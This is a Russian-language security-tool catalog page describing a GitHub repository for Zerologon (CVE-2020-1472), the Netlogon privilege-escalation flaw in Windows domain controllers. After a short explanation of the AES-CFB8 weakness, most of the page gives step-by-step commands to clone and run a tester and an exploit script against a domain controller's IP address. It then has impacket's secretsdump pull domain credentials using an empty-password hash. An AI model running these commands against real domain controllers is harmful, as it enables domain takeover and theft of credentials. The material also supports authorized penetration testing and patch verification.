Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-1472 — [CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon) | Kitploit
Инструменты/GitHubGitHub/murataydemir/cve-2020-1472
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingAuthenticationRed Teaming
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)

Репозиторий
125 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

[CVE-2020-1472] Повышение привилегий через удаленный вызов протокола Netlogon (MS-NRPC) (Zerologon)

Описанная здесь атака использует уязвимости в криптографическом протоколе аутентификации (небезопасное использование AES-CFB8), который подтверждает подлинность и идентичность компьютера, присоединенного к домену, перед контроллером домена (DC). Из-за неправильного использования режима работы AES можно подделать идентичность любой учетной записи компьютера (включая сам DC) и установить пустой пароль (просто отправляя несколько сообщений Netlogon, в которых различные поля заполнены нулями) для этой учетной записи в домене. Затем это можно использовать для получения учетных данных администратора домена и последующего восстановления исходного пароля DC.

Для проверки CVE-2020-1472

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (example: ./zerologon_tester.py DC01 172.16.208.161)

Для эксплуатации CVE-2020-1472

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (example: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

Затем выполните одну из следующих команд

Пример формата 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Пример формата 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Изображение PoC

Оригинальная запись в блоге доступна здесь
Оригинальный репозиторий с Python-скриптом для проверки доступен здесь
Оригинальный репозиторий с Python-скриптом для эксплуатации доступен здесь

Скачать инструмент